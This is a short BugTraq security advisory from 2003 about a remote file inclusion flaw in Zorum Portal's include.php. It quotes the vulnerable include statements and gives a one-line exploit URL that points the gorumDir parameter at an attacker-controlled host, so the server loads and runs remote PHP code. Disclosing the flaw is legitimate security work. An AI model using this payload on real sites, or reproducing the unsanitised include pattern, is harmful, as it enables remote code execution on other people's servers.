BugTraq
Zorum Portal (PHP) Jan 22 2003 07:45PM
MGhz (magas mail lt)


Version : 3.0;3.1;3.2

Website : http://zorum.phpoutsourcing.com/

Problem : Include file

File:

---------------------------------

include.php

---------------------------------

PHP Code:

---------------------------------

[...]

include("$gorumDir/generformlib_multipleselection.php");

include("$gorumDir/generformlib_groupselection.php");

include("$gorumDir/generformlib_filebutton.php");

include("$gorumDir/group.php");

[...]

---------------------------------

Exploit :

---------------------------------

http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/

-->

include http://[attacker]/group.php on remote server

---------------------------------

--

magas (at) mail (dot) lt [email concealed]

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus